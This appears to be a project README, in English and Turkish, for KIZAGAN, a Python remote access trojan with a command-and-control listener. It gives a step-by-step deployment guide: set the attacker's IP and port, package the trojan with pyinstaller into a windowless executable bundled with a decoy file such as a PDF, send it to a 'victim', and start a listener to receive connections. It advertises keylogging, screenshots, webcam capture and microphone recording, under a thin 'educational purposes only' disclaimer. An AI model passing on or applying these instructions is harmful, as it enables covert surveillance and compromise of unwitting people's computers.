kizagan
kizagan copied to clipboard
KIZAGAN is a RAT,c2 command&control tool.It allows you to build executables and control infected machines.
KIZAGAN (ENGLISH EXPRESSION)
KIZAGAN is a backdoor built with python(Remote Access Trojan) and it can take camera pictures,screenshots,getting microphone sounds... etc.
EDUCATIONAL PURPOSES ONLY.
I am not responsible for the crimes you may commit with this backdoor.
New update version (1.4.1)
New feautures :
When you converting exe the error occurs"no module named
Added turkish and english usage video.
SETUP :
python setup.py
USAGE :
English usage video : https://www.youtube.com/watch?v=d0xzBvH9OxE
Open the kizaganEN.py with text editor and change the ip and port according to yourself.
If you want the Trojan to run simultaneously with a file you specify,change the value of Open_Added_File function.If you don't want,just convert to exe with pyinstaller.
Then,use the pyinstaller to convert exe with file to be added, with command : (Be sure the file to be added and kizaganEN.py in the same location.)(Do this converting process in windows machine.In linux,some errors may occur.)
pyinstaller --onefile --noconsole --icon <your ico file (if you want)> --add-data "<examplefile.pdf>;." -w kizaganEN.py
Send this exe file to victim and wait for the victim execute the trojan.
Finally, use this command to start listener in your machine and wait the connection.(You don't need to start listener now,because the trojan will send you connection every 5 seconds.) :
python kizagan_listener.py -ip <ip_address_to_listen> -p <port_number_to_listen>
Example usages :
Listening connections.
Victim executes the trojan and a connection comes.
Help menu:
Taking camera pictures,screenshots,keylogs and microphone recording...
Author Instagram : https://www.instagram.com/arduinocum.py/
KIZAGAN (TÜRKÇE ANLATIM)
KIZAGAN bir python ile yapılmış backdoorudur(Remote Access Trojan) ve bu backdoor kamera görüntüleri,ekran görüntüleri,mikrofon kayıtları vb. alabilir...
SADECE EĞİTİM AMAÇLIDIR.
Bu backdoor ile işleyebileceğiniz suçlardan sorumlu değilim.
Yeni güncelleme versiyon (1.4.1)
Yeni özellikler :
Exe'ye çevirirken no module named hatası düzeltildi.(Bu hata bilgisayarınızda bazı kütüphanelerin bulunmamasından da kaynaklanıyor olabilir.)
Türkçe ve ingilizce kullanım videoları eklendi.
KURULUM :
python setup.py
KULLANIM :
Türkçe kullanım videosu : https://www.youtube.com/watch?v=b4hZe4SGFyw
kizaganTR.py'yi bir text editörü ile açın, ip ve portu kendinize göre değiştirin.
Trojan'ın belirttiğiniz bir dosya ile aynı anda açılmasını istiyorsanız,Eklenmis_Dosya_Ac fonksiyonunun değerini değiştirin. İstemiyorsanız, pyinstaller ile exe'ye dönüştürmeniz yeterlidir.
Ardından, eklenecek dosya ile exe'yi dönüştürmek için pyinstaller'ı şu komut ile kullanın: (Eklenecek dosyanın ve kizaganEN.py'nin aynı konumda olduğundan emin olun.)(Bu dönüştürme işlemini Windows makinesinde yapın.Linux'ta bazı hatalar çıkabilir.)
pyinstaller --onefile --noconsole --icon <ikon dosyaniz (eğer isterseniz)> --add-data "<ornekdosya.pdf>;." -w kizaganTR.py
Kurbana dönüştürdüğünüz bu exe dosyasını gönderin ve çalıştırmasını bekleyin.
Son olarak,bu komutu kullanarak dinleyiciyi kendi makinenizde başlatın ve bağlantıyı bekleyin.(Dinleyiciyi şimdi başlatmanıza gerek yok, çünkü trojan size her 5 saniyede bir bağlantı gönderecektir.) :
python kizagan_listener.py -ip <dinlemek_istediğiniz_ip_adresi> -p <dinlemek_istediğiniz_port_numarası>
Örnek kullanımlar :
Bağlantılar dinleniyor.
Kurban trojanı çalıştırdı ve bir bağlantı geldi.
Türkçe yardim menüsü.
Kamera resimleri,ekran görüntüleri,kurbanin bastigi tuslar ve kurbanin mikrofon kaydini almak...